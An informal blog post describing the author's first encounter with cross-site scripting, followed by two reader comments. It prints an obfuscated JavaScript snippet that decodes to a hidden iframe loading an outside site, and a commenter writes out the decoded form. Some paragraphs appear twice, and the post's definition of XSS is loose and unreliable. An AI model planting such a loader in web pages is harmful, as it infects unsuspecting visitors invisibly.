XSS: My first encounter
Had my first brush with Cross-Site-Scripting (XSS) a few days ago. Exactly what is XSS? Well, it's putting external links onto a website, as simple as that. The power with XSS is that that linked site could contain trojans!
This is yet one more way a hacker penetrates our PCs. They insert XSS links into your favourite (or popular sites) site. They link to websites that do contain trojans which then infect you. However, if u're not protected, the infection is invisible to you. Even if it's not successful you point the finger at your fav site cuz the trojan triggered when u visited it. Clever? Ingenious.
Oh, one more thing, check this out:
<script>
s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof
(!xjeui>2!ifjhiu>2!tsd>(iuuq;00jngsff/butqbdf/dpn0gsff/iunm(
?=0jgsbnf?#*<';o='';for(i=0;i<116;i++){
o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);
<script>
Nonsense? Nope, if u decode the simple Javascript, it's actually an IFRAME link to another site! Yep, XSS in action.
This is yet one more way a hacker penetrates our PCs. They insert XSS links into your favourite (or popular sites) site. They link to websites that do contain trojans which then infect you. However, if u're not protected, the infection is invisible to you. Even if it's not successful you point the finger at your fav site cuz the trojan triggered when u visited it. Clever? Ingenious.
Oh, one more thing, check this out:
<script>
s='epdvnfou/xsjuf)#=jgsbnf!tuzmf>(ejtqmbz;opof
(!xjeui>2!ifjhiu>2!tsd>(iuuq;00jngsff/butqbdf/dpn0gsff/iunm(
?=0jgsbnf?#*<';o='';for(i=0;i<116;i++){
o+=String.fromCharCode(s.charCodeAt(i)-1);}eval(o);
<script>
Nonsense? Nope, if u decode the simple Javascript, it's actually an IFRAME link to another site! Yep, XSS in action.
posted by Beng Hacks at 8:01 PM
2 Comments:
Wooo... the script tag is actually document.write("<iframe style='display:none' width=1 height=1
src='http://imfree.atspace.com/free.html'></iframe>");
I was glad to find this because I just had this happen to me too. It was a little different in the code, but not much. It rewrote every file that began with "index." throughout my whole site and probably throughout the whole server. What a mess.
Post a Comment
<< Home